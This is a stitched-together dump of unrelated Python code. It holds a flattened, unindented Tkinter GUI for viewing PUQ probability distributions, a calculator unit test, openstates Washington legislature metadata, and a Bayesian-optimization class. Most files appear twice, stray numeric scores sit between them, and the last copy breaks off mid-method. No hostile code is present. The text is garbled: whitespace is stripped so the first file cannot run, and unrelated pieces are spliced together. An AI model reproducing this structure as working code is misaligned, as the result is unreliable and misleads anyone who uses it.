Bin frame binframe = LabelFrame(fitframe, text='Bins', padx=5, pady=5) self.binscale = Scale(binframe, from_=2, to=100, orient=HORIZONTAL, resolution=1, showvalue=0) self.binscale.set(self.nbins) self.binscale.config(command=self.bins_changed) self.bine = Entry(binframe, width=5) self.bine.bind('<Return>', self.bins_changed) self.bine.pack(side=LEFT) self.bine.delete(0, END) self.bine.insert(0, str(self.nbins)) 
self.binscale.pack(fill=BOTH, expand=True, side=LEFT) bwframe.pack(side=TOP, fill=BOTH, expand=True) binframe.pack(side=TOP, fill=BOTH, expand=True) self.bwscale.config(state='disabled') self.bwe.config(state='disabled') fitframe.pack(side=RIGHT, fill=BOTH, expand=1) # Bottom Left Frame fdata = LabelFrame(lframe, text='Raw Data', padx=5, pady=5) f1 = Frame(fdata) f2 = Frame(fdata) MyLabel(f1, "Mean", '%.3g' % np.mean(self.data)).frame.pack(side=LEFT, padx=5) MyLabel(f1, "Dev", '%.3g' % np.std(self.data)).frame.pack(side=LEFT, padx=5) MyLabel(f2, "Min", '%.3g' % np.min(self.data)).frame.pack(side=LEFT, padx=5) MyLabel(f2, "Max", '%.3g' % np.max(self.data)).frame.pack(side=LEFT, padx=5) fpdf = LabelFrame(lframe, text='Fitted PDF', padx=5, pady=5) f1.pack(side=TOP, pady = 5, padx = 10, fill=BOTH) f2.pack(side=TOP, pady = 5, padx = 10, fill=BOTH) f1 = Frame(fpdf) f2 = Frame(fpdf) self.entry_min = MyEntry(f2, "Min", StringVar(), '%.3g' % pdf.range[0], callback=self.min_changed) self.entry_max = MyEntry(f2, "Max", StringVar(), '%.3g' % pdf.range[1], callback=self.max_changed) self.label_mean = MyLabel(f1, "Mean", '%.3g' % pdf.mean) self.label_dev = MyLabel(f1, "Dev", '%.3g' % pdf.dev) self.label_mode = MyLabel(f1, "Mode", '%.3g' % pdf.mode) for lab in [self.label_mean, self.label_dev, self.label_mode]: lab.frame.pack(side=LEFT, padx=5) f1.pack(side=TOP, pady = 5, padx = 10, fill=BOTH) f2.pack(side=TOP, pady = 5, padx = 10, fill=BOTH) fdata.pack(side=TOP, fill=BOTH) fpdf.pack(side=TOP, fill=BOTH) if nb and desc: tframe.pack(side=TOP, fill=BOTH, expand=0) cframe.pack(side=LEFT, fill=BOTH, expand=0) lframe.pack(side=LEFT, fill=BOTH, expand=1) rframe.pack(side=RIGHT, fill=BOTH, expand=1) bframe.pack(side=TOP, fill=BOTH, expand=1) def changed(self, fit=None, min=None, max=None, nbins=None, bw=None): #print 'PDF CHANGED %s %s %s %s %s' % (fit, min, max, nbins, bw) if fit != None: self.fit = fit self.binscale.config(state='normal') self.bine.config(state='normal') if self.fit 
== 'Linear': state = 'disabled' else: state = 'normal' self.bwscale.config(state=state) self.bwe.config(state=state) if min != None: if min == '': self.min = None else: self.min = min if max != None: if max == '': self.max = None else: self.max = max if nbins != None: self.nbins = nbins if bw != None: self.bw = bw if fit != None or bw != None or (self.fit == 'Linear' and nbins != None): self.pdf = ExperimentalPDF(self.data, fit=self.fit, nbins=self.nbins, bw=self.bw, min=self.min, max=self.max, force=1) try: self.line2.remove() except: pass try: for patch in self.line1[2]: patch.remove() except: pass self.a.relim() if self.bars.get(): self.line1 = self.a.hist(self.data, self.nbins, normed=1, facecolor=self.color, alpha=0.2) if self.show.get(): self.line2, = self.a.plot(self.pdf.x, self.pdf.y, self.color, linewidth=3) self.plotframe.update() self.entry_min.update('%.3g' % self.pdf.range[0]) self.entry_max.update('%.3g' % self.pdf.range[1]) self.label_mean.update('%.3g' % self.pdf.mean) self.label_dev.update('%.3g' % self.pdf.dev) self.label_mode.update('%.3g' % self.pdf.mode) def bins_changed(self, val): if isinstance(val, Event): val = int(self.bine.get()) else: val = int(val) if val != self.nbins: #print "bins_changed", val self.bine.delete(0, END) self.bine.insert(0, str(val)) self.changed(nbins=val) def bw_changed(self, val): if isinstance(val, Event): val = self.bwe.get() try: val = float(val) except: if val != 'silverman': val = None kde = gaussian_kde(self.data, bw_method=val) val = kde.factor self.bwscale.set(val) else: val = float(val) if val != self.bw: #print "BW changed from %s to %s" % (self.bw, val) if self.bw == None: self.bw = val else: self.bwe.delete(0, END) self.bwe.insert(0, "%.3g" % val) self.changed(bw=val) def fit_changed(self, val): if val != self.fit: self.changed(fit=val) def cb(self): self.changed() def color_changed(self, color): self.color = color self.changed() if self.nb: self.nb.tab(self.tnum,image=sq_image(color)) 
self.clab.config(image=sq_image(color)) def popup(self, event): print 'popup' self.menu.post(event.x_root, event.y_root) class ColorPop: def __init__(self, parent, callback): self.callback = callback # create a popup menu self.aMenu = Menu(root, tearoff=0) for color in sq_colors: self.aMenu.add_command(image=sq_image(color), command=lambda c=color: self.callback(c)) # attach popup to frame parent.bind("<Button-1>", self.popup) def popup(self, event): self.aMenu.post(event.x_root, event.y_root) class PdfFrameSimple(PdfFrame): def __init__(self, parent, obj, plotframe, nb=None, color=None, desc=None): #print "PdfFrameSimple Init" self.plotframe = plotframe self.a = plotframe.get_plot() self.nb = nb if nb: self.tnum = color color = self.get_color(color) bframe = Frame(parent) lframe = Frame(bframe, bd=1) rframe = Frame(bframe) self.show = IntVar(value=1) if nb: if desc: tframe = Frame(bframe) Label(tframe, text=desc, font=Font(weight="bold")).pack(fill=X, expand=1) tframe.pack(side=TOP, fill=X, expand=0) c = Checkbutton(lframe, variable=self.show, command=self.cb) c.pack() tool1 = ToolTip(c, follow_mouse=1, text='Show Plot') img = sq_image(color) self.clab = Label(lframe, text=' ', image=img) self.clab.photo = img self.clab.bind("<Button-1>", self.popup) cp = ColorPop(self.clab, callback=self.color_changed) tool2 = ToolTip(self.clab, follow_mouse=1, text='Select Plot Color') self.clab.pack(fill=X, expand=1) if isinstance(obj, PDF): self.par = None self.pdf = obj else: self.par = obj self.pdf = obj.pdf self.min = None self.max = None self.pdf_orig = self.pdf self.color = color self.line2, = self.a.plot(self.pdf.x, self.pdf.y, color=self.color, linewidth=3) # BOTTOM RIGHT frame3 = Frame(rframe) if self.par: frame1 = Frame(rframe) MyLabel(frame1, 'Type', self.par.__class__.__name__, bg='white').frame.pack(side=LEFT, padx=5) self.mean = MyLabel(frame3, "Mean", '%.3g' % self.pdf.mean) self.dev = MyLabel(frame3, "Dev", '%.3g' % self.pdf.dev) self.mode = MyLabel(frame3, 
"Mode", '%.3g' % self.pdf.mode) for lab in [self.mean, self.dev, self.mode]: lab.frame.pack(side=LEFT, padx=5) self.entry_min = MyEntry(frame3, "Min", StringVar(), '%.3g' % self.pdf.range[0], callback=self.min_changed) self.entry_max = MyEntry(frame3, "Max", StringVar(), '%.3g' % self.pdf.range[1], callback=self.max_changed) if self.par: frame1.pack(side=TOP, anchor='nw', fill=BOTH, expand=1) frame3.pack(side=BOTTOM, anchor='nw', fill=BOTH, expand=1) lframe.pack(side=LEFT, fill=X, expand=0) rframe.pack(side=RIGHT, fill=X, expand=1) bframe.pack(side=TOP, fill=X, expand=0) def cb(self): self.changed() def color_changed(self, color): self.color = color self.changed() if self.nb: self.nb.tab(self.tnum,image=sq_image(color)) self.clab.config(image=sq_image(color)) def popup(self, event): self.menu.post(event.x_root, event.y_root) def changed(self, min=None, max=None): #print 'Parameter Changed %s %s' % (min, max) if min != None: if min == '': self.min = None self.pdf = self.pdf_orig else: self.min = min nsamp = options['pdf']['numpart'] x = np.linspace(min, self.pdf.range[1], nsamp) y = np.interp(x, self.pdf_orig.x, self.pdf_orig.y) self.pdf = PDF(x, y) if max != None: if max == '': self.max = None self.pdf = self.pdf_orig else: self.max = max nsamp = options['pdf']['numpart'] x = np.linspace(self.pdf.range[0], max, nsamp) y = np.interp(x, self.pdf_orig.x, self.pdf_orig.y) self.pdf = PDF(x, y) self.mean.update('%.3g' % self.pdf.mean) self.dev.update('%.3g' % self.pdf.dev) self.mode.update('%.3g' % self.pdf.mode) self.entry_min.update('%.3g' % self.pdf.range[0]) self.entry_max.update('%.3g' % self.pdf.range[1]) try: self.line2.remove() except: pass self.a.relim() if self.show.get(): self.line2, = self.a.plot(self.pdf.x, self.pdf.y, color=self.color, linewidth=3) self.plotframe.update() class TimeFrame: def __init__(self, parent): self.tframe = Frame(parent) TimeFrame.me = weakref.proxy(self) def cleanup(self): try: self.tframe.pack_forget() 
self.canvas._tkcanvas.pack_forget() del self.canvas del self.f except: pass def plot(self, ext): from tkFileDialog import asksaveasfilename filename = asksaveasfilename(title="Plot to file...", initialfile='%s-response' % self.name, defaultextension='.%s' % ext, filetypes=[(ext.upper(), '*.%s' % ext)]) if not filename: return self.canvas.print_figure(filename) def state(self, st, val, path): self.cleanup() if st != 'RESPONSE': return self.name = os.path.basename(path[:-9]) self.f = plt.figure(figsize=(5, 5)) self.canvas = FigureCanvasTkAgg(self.f, master=self.tframe) self.canvas.get_tk_widget().pack(side=TOP, fill=BOTH, expand=1) self.tframe.pack(side=TOP, fill=BOTH, expand=1) self.canvas._tkcanvas.pack(side='top', fill='both', expand=1) if len(val.params) > 2: ax = Axes3D(self.f, azim=30.0, elev=30.0) ax.text2D(0.5, 0.5,'Cannot plot response functions\nwith more than 2 parameters', horizontalalignment='center', verticalalignment='center', transform = ax.transAxes) elif len(val.params) == 2: labels = CB.get('Labels') ax = Axes3D(self.f, azim=30.0, elev=30.0) val.plot(ax=ax, fig=self.f, title=0, labels=labels) else: self.a = self.f.add_subplot(111) self.a.grid(True) val.plot(fig=self.a) class SurFrame: def __init__(self, parent): self.parent = parent def cleanup(self): try: self.surframe.pack_forget() except: pass def rbf_changed(self, rbfunc): global modified #print "rbf changed to ", rbfunc #print self.val.rbf self.val.rbf = rbfunc del h5[self.path] h5[self.path] = pickle(self.val) # invalidate the pdf pdfpath = self.path[:-len('response')] + 'pdf' samplepath = self.path[:-len('response')] + 'samples' varname = self.path.split('/')[-2] if pdfpath in h5: del h5[pdfpath] if samplepath in h5: del h5[samplepath] # change treeview pdf tag to 'generate' for child in MyApp.app.tree.get_children('psweep'): item = MyApp.app.tree.item(child) if item['text'] == varname: for ch in MyApp.app.tree.get_children(child): item = MyApp.app.tree.item(ch) if item['text'] == 'pdf': 
MyApp.app.tree.item(ch, tags = ['generate']) modified = True MyApp.state_changed('RESPONSE', self.val, self.path) def state(self, st, val, path): self.cleanup() if st != 'RESPONSE': return if isinstance(val, SampledFunc): self.val = val self.surframe = LabelFrame(self.parent, text="Radial Basis Function") rbfvals = [ "multiquadric", "linear", "cubic", "quintic", "inverse", "gaussian" ] self.rbf = MyCombobox(self.surframe, 'RBF', rbfvals, current=val.rbf, callback=self.rbf_changed) else: self.surframe = LabelFrame(self.parent, text="Surface") # Surface Pane self.eqn = ScrolledText.ScrolledText(self.surframe, height=2, ) self.eqn.insert(END, val.eqn) self.eqn.pack(side=TOP, expand=YES, fill=BOTH, padx=5, pady=5) # RMSE rmsep = val.rmse()[1] if rmsep > 10: bgcolor = 'red' elif rmsep > 5: bgcolor = 'orange' elif rmsep > 2: bgcolor = 'yellow' else: bgcolor = '' self.rmse = MyLabel(self.surframe, value='%.3g%%' % rmsep, text='RMSE', bg=bgcolor) self.rmse.frame.pack(side=TOP, anchor='w', padx=5, pady=5) self.surframe.pack(side=LEFT, fill=BOTH, expand=1) class ParFrame: def __init__(self, parent): self.parent = parent def cleanup(self): try: self.parframe.pack_forget() except: pass def state(self, st, val, path): self.cleanup() if st != 'RESPONSE': return self.parframe = Frame(self.parent) self.parframe.pack(side=LEFT, fill=BOTH, expand=1) # Parameters Table with scrollbar scrollbar = Scrollbar(self.parframe) scrollbar.pack(side=RIGHT, fill=Y) t=ttk.Treeview(self.parframe, yscrollcommand=scrollbar.set, height=len(val.params)) t["columns"]=("desc","pdf") t.column("#0", width=75) t.column("desc", width=100) t.column("pdf", width=400) t.heading("#0", text='Name') t.heading("#1", text='Description') t.heading("#2", text='PDF') for p in val.params: cname = p.__class__.__name__[:-9] pdf_str = '%s [%s - %s] mean=%s dev=%s mode=%s' % (cname, p.pdf.range[0], p.pdf.range[1], p.pdf.mean, p.pdf.dev, p.pdf.mode) t.insert("", "end", text=p.name, values=[p.description, pdf_str]) 
t.tag_configure("ttk") scrollbar.config(command=t.yview) t.pack(side=TOP, fill=BOTH, expand=YES) class MyApp: def __init__(self, parent, objlist): self.parent = parent parent.protocol('WM_DELETE_WINDOW', self.quit) # contains everything self.container = Frame(self.parent) self.container.pack(fill=BOTH, expand=YES) # top frame self.tframe = Frame(self.container) self.bframe = Frame(self.container) detailframe = None plotframe = PlotFrame(self.tframe) if isinstance(objlist, list): cnote = CNote(self.bframe) for cnum, obj in enumerate(objlist): f = Frame(cnote) PdfFactory(f, obj[0], plotframe, nb=cnote, color=cnum, desc=obj[2]) cnote.add(f, color=cnum, text=obj[1], padding=3) cnote.pack(expand=1, fill=BOTH) else: detailframe = PdfFactory(self.bframe, objlist[0], plotframe) MB(parent, plotframe, detailframe) self.tframe.pack(side=TOP, fill=BOTH, expand=YES) self.bframe.pack(side=LEFT, fill=BOTH, expand=YES) def quit(self): global windows wdw = self.parent if wdw in windows: windows.remove(wdw) if not windows: wdw.quit() wdw.destroy() def show_obj(objlist, compare=0): global root, windows root = Tk() root.withdraw() windows = [] if compare: win = Toplevel() windows.append(win) win.title('PUQ Compare') MyApp(win, objlist) else: for i, obj in enumerate(objlist): win = Toplevel() windows.append(win) try: win.title(namelist[i]) except: win.title(obj[2]) MyApp(win, obj) root.mainloop() # loads python file # returns list [(obj, name, desc), (obj, name, desc), ...] 
def python_load(fname): sys.path = [os.getcwd()] + sys.path module = os.path.splitext(os.path.split(fname)[1])[0] _temp = __import__(module, globals(), locals(), [], 0) pdflist = [] for name, obj in _temp.__dict__.iteritems(): if isinstance(obj, Parameter): desc = obj.description if desc == name: desc = '' pdflist.append((obj, name, "%s: %s (%s)" % (fname, name, desc))) elif isinstance(obj, PDF): pdflist.append((obj, name, "%s: %s" % (fname, name))) if 'run' in _temp.__dict__: def extract_params(uq,b,c): for pm in uq.params: if pm.description and pm.description != pm.name: pdflist.append((pm, pm.name, ('%s: %s (%s)' % (fname, pm.name, pm.description)))) else: pdflist.append((pm, pm.name, ('%s: %s' % (fname, pm.name)))) _temp.Sweep = extract_params _temp.run() if len(pdflist) == 0: print 'Error: Found no PDFs or Parameters in %s' % fname sys.exit(1) if len(pdflist) == 1: return pdflist while 1: print '\nList PDFs you want displayed, separated by commas.' print '\nFound the following PDFs:' for i, p in enumerate(pdflist): print "%d: %s" % (i, p[1]) num = raw_input("Which one(s) to display? (* for all) ") try: if num == '*': numlist = pdflist else: numlist = map(int, num.split(',')) numlist = [pdflist[x] for x in numlist] break except: print 'Invalid number. Try again.\n' return numlist def get_name_desc(obj, loc): if isinstance(obj, Parameter): name = obj.name desc = obj.description else: name = os.path.splitext(loc)[0] desc = '' return name, desc # returns list [(obj, name, desc), (obj, name, desc), ...] def read_obj(loc): name = None desc = None if loc.startswith('http'): try: obj = NetObj(loc) name, desc = get_name_desc(obj, loc) return [(obj, name, desc)] except: print "Error accessing", loc return [] else: extension = loc.split('.')[-1] if extension == 'json': f = open(loc, 'r') obj = unpickle(f.read()) f.close() name, desc = get_name_desc(obj, loc) return [(obj, name, desc)] elif extension == 'py': return python_load(loc) print "Don't know how to open %s." 
% loc return [] def read(*args): opt, args = parse_args(list(args)) objlist = [] for arg in args: objs = read_obj(arg) objlist.extend(objs) if objlist: show_obj(objlist, compare=opt.c) def parse_args(args): debug(args) usage = "Usage: puq read [options] [object] ...\n\ where 'object' is a URI, python file, or JSON file\n\ Options:\n\ -c Compare. When two or more objects are given, display them in the same plot.\n\ " parser = OptionParser(usage) parser.add_option("-c", action="store_true", help="Compare plots.") (opt, ar) = parser.parse_args(args=args) return opt, ar if __name__ == "__main__": read(*sys.argv[1:])
0.255065
0.12408
import unittest from Calculator import Calculator from CsvReader import CsvReader class MyTestCase(unittest.TestCase): def setUp(self) -> None: self.calculator = Calculator() def test_instantiate_calculator(self): self.assertIsInstance(self.calculator, Calculator) def test_subtract(self): test_data = CsvReader('/src/Unit Test Subtraction.csv').data for row in test_data: self.assertEqual(self.calculator.Subtraction(row['Value 1'], row['Value 2']), int(row['Result'])) self.assertEqual(self.calculator.result, int(row['Result'])) def test_add(self): test_data = CsvReader('/src/Unit Test Addition.csv').data for row in test_data: self.assertEqual(self.calculator.Addition(row['Value 1'], row['Value 2']), int(row['Result'])) self.assertEqual(self.calculator.result, int(row['Result'])) def test_multiply(self): test_data = CsvReader('/src/Unit Test Multiplication.csv').data for row in test_data: self.assertEqual(self.calculator.Multiply(row['Value 1'], row['Value 2']), int(row['Result'])) self.assertEqual(self.calculator.result, int(row['Result'])) def test_divide(self): test_data = CsvReader('/src/Unit Test Division.csv').data for row in test_data: self.assertEqual(self.calculator.Division(row['Value 1'], row['Value 2']), float(row['Result'])) self.assertEqual(self.calculator.result, float(row['Result'])) def test_square(self): test_data = CsvReader('/src/Unit Test Square.csv').data for row in test_data: self.assertEqual(self.calculator.square(row['Value 1']), float(row['Result'])) self.assertEqual(self.calculator.result, float(row['Result'])) def test_square_root(self): test_data = CsvReader('/src/Unit Test Square Root.csv').data for row in test_data: self.assertEqual(self.calculator.squareroot(row['Value 1']), float(row['Result'])) self.assertEqual(self.calculator.result, float(row['Result'])) def test_results_property(self): self.assertEqual(self.calculator.result, 0) if __name__ == '__main__': unittest.main()
src/CalculatorTests.py
import unittest from Calculator import Calculator from CsvReader import CsvReader class MyTestCase(unittest.TestCase): def setUp(self) -> None: self.calculator = Calculator() def test_instantiate_calculator(self): self.assertIsInstance(self.calculator, Calculator) def test_subtract(self): test_data = CsvReader('/src/Unit Test Subtraction.csv').data for row in test_data: self.assertEqual(self.calculator.Subtraction(row['Value 1'], row['Value 2']), int(row['Result'])) self.assertEqual(self.calculator.result, int(row['Result'])) def test_add(self): test_data = CsvReader('/src/Unit Test Addition.csv').data for row in test_data: self.assertEqual(self.calculator.Addition(row['Value 1'], row['Value 2']), int(row['Result'])) self.assertEqual(self.calculator.result, int(row['Result'])) def test_multiply(self): test_data = CsvReader('/src/Unit Test Multiplication.csv').data for row in test_data: self.assertEqual(self.calculator.Multiply(row['Value 1'], row['Value 2']), int(row['Result'])) self.assertEqual(self.calculator.result, int(row['Result'])) def test_divide(self): test_data = CsvReader('/src/Unit Test Division.csv').data for row in test_data: self.assertEqual(self.calculator.Division(row['Value 1'], row['Value 2']), float(row['Result'])) self.assertEqual(self.calculator.result, float(row['Result'])) def test_square(self): test_data = CsvReader('/src/Unit Test Square.csv').data for row in test_data: self.assertEqual(self.calculator.square(row['Value 1']), float(row['Result'])) self.assertEqual(self.calculator.result, float(row['Result'])) def test_square_root(self): test_data = CsvReader('/src/Unit Test Square Root.csv').data for row in test_data: self.assertEqual(self.calculator.squareroot(row['Value 1']), float(row['Result'])) self.assertEqual(self.calculator.result, float(row['Result'])) def test_results_property(self): self.assertEqual(self.calculator.result, 0) if __name__ == '__main__': unittest.main()
0.635675
0.585397
import lxml.html
from billy.utils.fulltext import text_after_line_numbers

from .bills import WABillScraper
from .legislators import WALegislatorScraper
from .committees import WACommitteeScraper
from .events import WAEventScraper

# Washington's legislative services can be slow; allow a generous timeout.
settings = dict(SCRAPELIB_TIMEOUT=300)

# Static description of the Washington State Legislature consumed by billy.
metadata = dict(
    name='Washington',
    abbreviation='wa',
    capitol_timezone='America/Los_Angeles',
    legislature_name='Washington State Legislature',
    legislature_url='http://www.leg.wa.gov/',
    chambers={
        'upper': {'name': 'Senate', 'title': 'Senator'},
        'lower': {'name': 'House', 'title': 'Representative'},
    },
    terms=[
        {'name': '2009-2010', 'start_year': 2009, 'end_year': 2010,
         'sessions': ['2009-2010']},
        {'name': '2011-2012', 'start_year': 2011, 'end_year': 2012,
         'sessions': ['2011-2012']},
        {'name': '2013-2014', 'start_year': 2013, 'end_year': 2014,
         'sessions': ['2013-2014']},
        {'name': '2015-2016', 'start_year': 2015, 'end_year': 2016,
         'sessions': ['2015-2016']},
    ],
    session_details={
        '2009-2010': {'display_name': '2009-2010 Regular Session',
                      '_scraped_name': '2009-10',
                      },
        '2011-2012': {'display_name': '2011-2012 Regular Session',
                      '_scraped_name': '2011-12',
                      },
        '2013-2014': {'display_name': '2013-2014 Regular Session',
                      '_scraped_name': '2013-14',
                      },
        '2015-2016': {'display_name': '2015-2016 Regular Session',
                      '_scraped_name': '2015-16',
                      },
    },
    feature_flags=['events', 'subjects', 'capitol_maps', 'influenceexplorer'],
    capitol_maps=[
        {"name": "Floor 1",
         "url": 'http://static.openstates.org/capmaps/wa/f1.gif'},
        {"name": "Floor 2",
         "url": 'http://static.openstates.org/capmaps/wa/f2.gif'},
        {"name": "Floor 3",
         "url": 'http://static.openstates.org/capmaps/wa/f3.gif'},
        {"name": "Floor 4",
         "url": 'http://static.openstates.org/capmaps/wa/f4.gif'},
    ],
    _ignored_scraped_sessions=['2007-08'],
)


def session_list():
    """Scrape the session names from the bill-info page's tab control."""
    from billy.scrape.utils import url_xpath
    return url_xpath(
        'http://apps.leg.wa.gov/billinfo/',
        '//td[starts-with(@id, "ctl00_ContentPlaceHolder1_TabControl1")]/text()')


def extract_text(doc, data):
    """Return the concatenated text of every <p> in the body of `data` (HTML)."""
    parsed = lxml.html.fromstring(data)
    return ' '.join(node.text_content() for node in parsed.xpath('//body/p'))
openstates/openstates-master/openstates/wa/__init__.py
import lxml.html
from billy.utils.fulltext import text_after_line_numbers

from .bills import WABillScraper
from .legislators import WALegislatorScraper
from .committees import WACommitteeScraper
from .events import WAEventScraper

# Washington's legislative services can be slow; allow a generous timeout.
settings = dict(SCRAPELIB_TIMEOUT=300)

# Static description of the Washington State Legislature consumed by billy.
metadata = dict(
    name='Washington',
    abbreviation='wa',
    capitol_timezone='America/Los_Angeles',
    legislature_name='Washington State Legislature',
    legislature_url='http://www.leg.wa.gov/',
    chambers={
        'upper': {'name': 'Senate', 'title': 'Senator'},
        'lower': {'name': 'House', 'title': 'Representative'},
    },
    terms=[
        {'name': '2009-2010', 'start_year': 2009, 'end_year': 2010,
         'sessions': ['2009-2010']},
        {'name': '2011-2012', 'start_year': 2011, 'end_year': 2012,
         'sessions': ['2011-2012']},
        {'name': '2013-2014', 'start_year': 2013, 'end_year': 2014,
         'sessions': ['2013-2014']},
        {'name': '2015-2016', 'start_year': 2015, 'end_year': 2016,
         'sessions': ['2015-2016']},
    ],
    session_details={
        '2009-2010': {'display_name': '2009-2010 Regular Session',
                      '_scraped_name': '2009-10',
                      },
        '2011-2012': {'display_name': '2011-2012 Regular Session',
                      '_scraped_name': '2011-12',
                      },
        '2013-2014': {'display_name': '2013-2014 Regular Session',
                      '_scraped_name': '2013-14',
                      },
        '2015-2016': {'display_name': '2015-2016 Regular Session',
                      '_scraped_name': '2015-16',
                      },
    },
    feature_flags=['events', 'subjects', 'capitol_maps', 'influenceexplorer'],
    capitol_maps=[
        {"name": "Floor 1",
         "url": 'http://static.openstates.org/capmaps/wa/f1.gif'},
        {"name": "Floor 2",
         "url": 'http://static.openstates.org/capmaps/wa/f2.gif'},
        {"name": "Floor 3",
         "url": 'http://static.openstates.org/capmaps/wa/f3.gif'},
        {"name": "Floor 4",
         "url": 'http://static.openstates.org/capmaps/wa/f4.gif'},
    ],
    _ignored_scraped_sessions=['2007-08'],
)


def session_list():
    """Scrape the session names from the bill-info page's tab control."""
    from billy.scrape.utils import url_xpath
    return url_xpath(
        'http://apps.leg.wa.gov/billinfo/',
        '//td[starts-with(@id, "ctl00_ContentPlaceHolder1_TabControl1")]/text()')


def extract_text(doc, data):
    """Return the concatenated text of every <p> in the body of `data` (HTML)."""
    parsed = lxml.html.fromstring(data)
    return ' '.join(node.text_content() for node in parsed.xpath('//body/p'))
0.350199
0.150715
import numpy as np
from scipy.stats import norm
from scipy.spatial.distance import cdist

from .sbom import SBOM


class BayesianOptimizer(SBOM):
    """Sequence-model optimizer proposing positions by expected improvement (EI)."""

    def __init__(self, init_positions, space_dim, opt_para):
        super().__init__(init_positions, space_dim, opt_para)
        self.regr = self._opt_args_.gpr  # Gaussian-process surrogate regressor
        self.new_positions = []  # queue of proposals reused between surrogate refits

    def _expected_improvement(self):
        """Return the expected improvement of a random sample of positions.

        All vectors are reshaped to column form (n, 1); positions where the
        surrogate predicts zero std get EI = 0 (division by zero is masked
        via np.divide's `where` argument).
        """
        all_pos_comb_sampled = self.get_random_sample()
        mu, sigma = self.regr.predict(all_pos_comb_sampled, return_std=True)
        mu_sample = self.regr.predict(self.X_sample)

        mu = mu.reshape(-1, 1)
        sigma = sigma.reshape(-1, 1)
        mu_sample = mu_sample.reshape(-1, 1)

        mu_sample_opt = np.max(mu_sample)
        # xi trades off exploration vs. exploitation.
        imp = mu - mu_sample_opt - self._opt_args_.xi
        Z = np.divide(imp, sigma, out=np.zeros_like(sigma), where=sigma != 0)
        exp_imp = imp * norm.cdf(Z) + sigma * norm.pdf(Z)
        exp_imp[sigma == 0.0] = 0.0

        return exp_imp

    def _propose_location(self, nth_iter):
        """Fit the surrogate and return a batch of diverse candidate positions.

        Candidates are taken in decreasing-EI order; after each accepted
        candidate, positions whose normalized cityblock distance to it is
        <= 0.25 are dropped so the batch stays spread out.
        """
        self.regr.fit(self.X_sample, self.Y_sample)
        exp_imp = self._expected_improvement()
        exp_imp = exp_imp[:, 0]

        index_best = list(exp_imp.argsort()[::-1])
        all_pos_comb_sorted = self.all_pos_comb[index_best]

        pos_best = [all_pos_comb_sorted[0]]
        while len(pos_best) < self._opt_args_.skip_retrain(nth_iter):
            if all_pos_comb_sorted.shape[0] == 0:
                break
            dists = cdist(all_pos_comb_sorted, [pos_best[-1]], metric="cityblock")
            dists_norm = dists / dists.max()
            # Fixed: this mask was previously named `bool`, shadowing the builtin.
            far_enough = np.squeeze(dists_norm > 0.25)
            all_pos_comb_sorted = all_pos_comb_sorted[far_enough]

            if len(all_pos_comb_sorted) > 0:
                pos_best.append(all_pos_comb_sorted[0])

        return pos_best

    def iterate(self, nth_iter):
        """Return the next position to evaluate.

        The first `start_up_evals` iterations explore randomly; after that,
        positions are drawn from the queued EI proposals, refitting the
        surrogate only when the queue runs empty.
        """
        self._base_iterate(nth_iter)
        self._sort_()
        self._choose_next_pos()

        if nth_iter < self._opt_args_.start_up_evals:
            pos = self.p_current.move_random()
        else:
            if len(self.new_positions) == 0:
                self.new_positions = self._propose_location(nth_iter)
            pos = self.new_positions[0]
            self.p_current.pos_new = pos
            self.new_positions.pop(0)

        self.X_sample.append(pos)
        return pos

    def evaluate(self, score_new):
        """Record `score_new` for the position returned by the last iterate()."""
        self.p_current.score_new = score_new
        self._evaluate_new2current(score_new)
        self._evaluate_current2best()

        # Periodically snap the current particle back to its best-known state.
        if self.nth_iter % self._opt_args_.n_neighbours == 0:
            self.p_current.score_current = self.p_current.score_best
            self.p_current.pos_current = self.p_current.pos_best

        self.Y_sample.append(score_new)
        self.nth_iter += 1
gradient_free_optimizers/sequence_model/bayesian_optimization.py
import numpy as np
from scipy.stats import norm
from scipy.spatial.distance import cdist

from .sbom import SBOM


class BayesianOptimizer(SBOM):
    """Sequence-model optimizer proposing positions by expected improvement (EI)."""

    def __init__(self, init_positions, space_dim, opt_para):
        super().__init__(init_positions, space_dim, opt_para)
        self.regr = self._opt_args_.gpr  # Gaussian-process surrogate regressor
        self.new_positions = []  # queue of proposals reused between surrogate refits

    def _expected_improvement(self):
        """Return the expected improvement of a random sample of positions.

        All vectors are reshaped to column form (n, 1); positions where the
        surrogate predicts zero std get EI = 0 (division by zero is masked
        via np.divide's `where` argument).
        """
        all_pos_comb_sampled = self.get_random_sample()
        mu, sigma = self.regr.predict(all_pos_comb_sampled, return_std=True)
        mu_sample = self.regr.predict(self.X_sample)

        mu = mu.reshape(-1, 1)
        sigma = sigma.reshape(-1, 1)
        mu_sample = mu_sample.reshape(-1, 1)

        mu_sample_opt = np.max(mu_sample)
        # xi trades off exploration vs. exploitation.
        imp = mu - mu_sample_opt - self._opt_args_.xi
        Z = np.divide(imp, sigma, out=np.zeros_like(sigma), where=sigma != 0)
        exp_imp = imp * norm.cdf(Z) + sigma * norm.pdf(Z)
        exp_imp[sigma == 0.0] = 0.0

        return exp_imp

    def _propose_location(self, nth_iter):
        """Fit the surrogate and return a batch of diverse candidate positions.

        Candidates are taken in decreasing-EI order; after each accepted
        candidate, positions whose normalized cityblock distance to it is
        <= 0.25 are dropped so the batch stays spread out.
        """
        self.regr.fit(self.X_sample, self.Y_sample)
        exp_imp = self._expected_improvement()
        exp_imp = exp_imp[:, 0]

        index_best = list(exp_imp.argsort()[::-1])
        all_pos_comb_sorted = self.all_pos_comb[index_best]

        pos_best = [all_pos_comb_sorted[0]]
        while len(pos_best) < self._opt_args_.skip_retrain(nth_iter):
            if all_pos_comb_sorted.shape[0] == 0:
                break
            dists = cdist(all_pos_comb_sorted, [pos_best[-1]], metric="cityblock")
            dists_norm = dists / dists.max()
            # Fixed: this mask was previously named `bool`, shadowing the builtin.
            far_enough = np.squeeze(dists_norm > 0.25)
            all_pos_comb_sorted = all_pos_comb_sorted[far_enough]

            if len(all_pos_comb_sorted) > 0:
                pos_best.append(all_pos_comb_sorted[0])

        return pos_best

    def iterate(self, nth_iter):
        """Return the next position to evaluate.

        The first `start_up_evals` iterations explore randomly; after that,
        positions are drawn from the queued EI proposals, refitting the
        surrogate only when the queue runs empty.
        """
        self._base_iterate(nth_iter)
        self._sort_()
        self._choose_next_pos()

        if nth_iter < self._opt_args_.start_up_evals:
            pos = self.p_current.move_random()
        else:
            if len(self.new_positions) == 0:
                self.new_positions = self._propose_location(nth_iter)
            pos = self.new_positions[0]
            self.p_current.pos_new = pos
            self.new_positions.pop(0)

        self.X_sample.append(pos)
        return pos

    def evaluate(self, score_new):
        """Record `score_new` for the position returned by the last iterate()."""
        self.p_current.score_new = score_new
